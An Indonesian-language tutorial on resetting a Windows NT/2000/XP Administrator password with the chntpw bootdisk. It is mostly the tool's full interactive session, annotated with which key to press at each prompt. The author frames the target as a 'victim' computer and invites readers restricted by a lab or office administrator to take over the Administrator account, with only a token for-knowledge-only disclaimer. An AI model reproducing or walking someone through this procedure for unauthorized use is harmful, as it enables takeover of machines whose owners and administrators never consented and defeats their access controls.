Hacking Windows NT2000XP Administrator Password

Sebelum pembaca kecewa, sebelumnya saya mau menjelaskan bahwa teknik yang akan saya jelaskan disini hanya akan berhasil bila anda memiliki akses fisik ke komputer korban !!

Arti dari akses fisik disini adalah bila anda memiliki ijin untuk dapat memakai komputer tersebut dan terutama anda dapat memasukkan disket ke dalam komputer korban.

Mungkin anda termasuk orang yang terlampau dibatasi pemakaian komputernya oleh admin di lab/kantor anda, sekaranglah saatnya anda malampaui batas anda ;) Pada artikel ini anda akan belajar bagaimana menghapus password Administrator dan kemudian bisa menggantinya sesuai dengan keinginan anda.

Baiklah kita mulai saja, tapi sebelumnya saya mau pesan bahwa artikel ini saya tulis untuk pengetahuan semata !! Bila terjadi hal yang tidak diinginkan, itu di luar tanggung jawab saya. Hal ini perlu saya sampaikan agar jangan ada yang menuntut saya karena satu dan lain hal.

Yang kita butuhkan adalah sebuah Bootdisk image yang dapat didownload di 

http://home.eunet.no/~pnordahl/ntpasswd/bd040116.zip.

Setelah didownload segera ekstrak dan jalankan file install.bat, tapi sebelumnya masukkan sebuah disket kosong ke dalam floppy disk drive anda. Ketika file install.bat dijalankan, maka sebuah floppy disk yang bootable akan dibuat. Nah, disket inilah yang akan kita gunakan untuk melakukan hack.

Setelah bootdisk selesai dibuat, restart komputer anda dengan membiarkan disket tadi tetap di floppy disk drive. Mungkin anda perlu mengatur boot sequence agar ketika booting yang pertama kali diboot adalah floppy disk drive.

Bila disket anda berhasil diboot, maka tinggal ikuti petunjuk saja. Berikut adalah cuplikan dari program tersebut : ( komentar saya akan diawali dengan tanda '-->;')
-->; tampilan yang muncul pertama kali

****************************************************************
* This utility will enable you to change the password of almost
* any user (incl. administrator) on an Windows NT/2k/XP installation
* WITHOUT knowing the old password.
* The program is now able to actually parse/follow the internal
* registry structure completely.
* There is now support for adding and deleting keys and values.

• Tested on: NT3.51 & NT4: Workstation, Server, PDC.
• Win2k Prof & Server to SP3. Cannot change AD.
• XP Home & Prof: up to SP1
• Now also works with syskey, read warnings if applicable
• You may either let the scripts try to figure out your configuration,
•  or you may do it manually from the shell prompts.
• Good luck!

Press return/enter to continue
--> tekan enter
* In /etc/main.rc....
Calling scsi.rc to probe for SCSI controllers
Mounting floppy to fetch drivers from /scsi on it
SCSI-drivers found on floppy:

BusLogic.o.gz aic7xxx.o.gz

Do you have your NT disks on a SCSI controller?
y - this will autoprobe for the driver
n - no, skip SCSI, I have IDE drives
or give the scsi-driver modules name (without the .o or .gz)
+ optional parameters to go directly for a known driver

Probe for SCSI-drivers: [n]

--> tekan enter

Calling part.rc to select partition
Partitions found on the disk(s):
Device Boot Start End Blocks Id System
/dev/hda1 * 1 1859 14932386 7 HPFS/NTFS

Probable NT partitions:
/dev/hda1 * 1 1859 14932386 7 HPFS/NTFS
Wnat partition contains your NT installation?
[/dev/hda1] : Enter
FAT: Did not find valid FSINFO signature.
Found signature1 0x66024a1e signature2 0xc88b6602 sector=4.
VFS: Can't find a valid FAT filesystem on dev 03:01.
mount: wrong fs type, bad option, bad superblock on /deb/hda1,
or too many mounted fil systems
/dev/hda1 is NTFS.
Trying to mount as readwrite on /mnt
NTFS volume version 3.0.
Success. Mounted NTFS /deb/hda1 on /mnt
Calling path.rc. to select path
What is the full path to the registry directory?
[winnt/system32/config] :

--> tekan enter

-rw------- 1 0 0 65536 Jan 15 09:00
AppEvent.Evt
-rw------- 1 0 0 65536 Jan 15 09:00 default
-rw------- 1 0 0 65536 Jan 15 09:00 default.LOG
-rw------- 1 0 0 65536 Jan 15 09:00 default.sav
-rw------- 1 0 0 65536 Jan 15 09:00
netlogon.ftl
-rw------- 1 0 0 65536 Jan 15 09:00 SAM
-rw------- 1 0 0 65536 Jan 15 09:00 SAM.LOG
-rw------- 1 0 0 65536 Jan 15 09:00
SecEvent.Evt
-rw------- 1 0 0 65536 Jan 15 09:00 SECURITY
-rw------- 1 0 0 65536 Jan 15 09:00
SECURITY.LOG
-rw------- 1 0 0 65536 Jan 15 09:00 software
-rw------- 1 0 0 65536 Jan 15 09:00
software.LOG
-rw------- 1 0 0 65536 Jan 15 09:00
software.sav
-rw------- 1 0 0 65536 Jan 15 09:00
SysEvent.Evt
-rw------- 1 0 0 65536 Jan 15 09:00 system.sav
-rw------- 1 0 0 65536 Jan 15 09:00 TempLey.LOG
-rw------- 1 0 0 65536 Jan 15 09:00 userdiff
-rw------- 1 0 0 65536 Jan 15 09:00
userdiff.LOG
Which hives (files) do you want to edit (leave default for
password setting, separate multiple names with spaces)
[sam system security] :

--> tekan enter

Copying sam system security to /tmp

Now running chntpw
chntpw version 0.99.0 030112, (c) Petter N Hagen
Hive's name (from header) (\SystemRoot\System32\Config\Sam)
ROOT KEY at offset: 0x001020

File size 32768 [8000] bytes, containing 7 pages (+ 1 headerpage)
Used, for data: 319/26472 blocks/bytes, unused: 6/1976 blocks/bytes.
Hive's name (from header): (SYSTEM)
ROOT KEY at offset: 0x001020

File size 2555904 [270000] bytes, containing 584 pages (+ 1
headerpage)
Used, for data: 44209/2524072 blocks/bytes, unused: 19/9048
blocks/bytes.
Hive's name (from header): (SYSTEM)
ROOT KEY at offset: 0x001020

File size 49152 [c000] bytes, containing 11 pages (+ 1 headerpage)
Used, for data: 859/42568 blocks/bytes, unused: 5/2136 blocks/bytes.
Hello, this is SAM!
Failed logins before lockout is : 0
Minimum password length : 0
Password history count : 0

()========() chntpw Main Interactive Menu ()========()
Loaded hives: (sam) (system) (security)
1 - Edit user data and passwords
2 - Syskey status & change
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)

What to do? [1] ->

--> Nah, karena kita akan mengganti password Administrator
maka tekan saja enter

==== chntpw Edit User Info & Passwords ====

RID: 03f2, Username: (Administrator)
RID: 03f2, Username: (gandhi)
RID: 03f2, Username: (Guest), disabled or locked*

Select: ! - quit, . - list users, 0x(RID) - User with RID
(hex)
or simple enter the username to change: [Administrator]

--> tekan enter (user Administrator yang akan direset)

RID : 032f
Username: Administrator
fullname:
comment :
homedir :

Account bits: 0x0215 =
[ ] Disabled | [ ] Homedir req. | [
] passwd not req. |
[ ] Temp. duplicate | [X] Normail account | [ ] NMS
account |
[ ] Domain trust ac | [ ] Wks trust act. | [ ]
Srv trust act |
[X] Pwd don't expir | [ ] Auto lockout | [ ]
(unknown 0x08) |
[ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ]
(unknown 0x40) |

Failed login count: 0, while max tries is : 0
Total login.count : 7
Account is disabled
Crypted NT pw : 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00
Crypted LM pw : 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00
MD4 hash : 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00
LANMAN hash : 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00

* = blank the password (EXPERIMENTAL! but may fix problems) Enter nothing to leave it unchanged
Please enter new password: *

-> Anda akan diminta untuk memasukkan password untuk menggantikan password Administrator, lebih baik anda langsung enter saja, yang berarti passwordnya ditinggalkan kosong.

Blanking password. This may actually fix things if previous password-preset did not work. Or it may even make things worse. Happy joy!

Do you really wish to change it? (y/n) [n]

--> ketik y

Select: ! - quit, . - list users, 0x(RID) - User with RID
(hex)
or simple enter the username to change: [Administrator]
--> ketik !

()========() chntpw Main Interactive Menu ()========()
Loaded hives: (sam) (system) (security)
1 - Edit user data and passwords
2 - Syskey status & change
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)

What to do? [1] ->
--> ketik q

Hives that have changed:
# Name
0 (sam)
Write hive files? (y/n) [n] :

--> ketik y

Calling write.rc to select write back sam file
About to write file(s) back! Do it? [n]
--> ketik y

Writing sam

• end of scripts.. returning to the shell..
• Press CTRL-ALT-DELL to reboot now (remove floppy first)
• or do whatever you want from the shell..
• However, if you mount something, remember to umount before reboot
• You may also restart the script procedure with 'sh  /scripts/main.rc'#

Nah, selamat ! Sekarang restart komputer anda dan anda dapat login dengan username Adminisrtator dengan mengosongkan password. Selanjutnya ? terserah anda ;)

pesan untuk lmt at far ui '02 :
10*(2*x^2+y^2+z^2-1)^3 - x^2*z^3 - 10*y^2*z^3 = 0

"Mathematics is the languange of the Universe"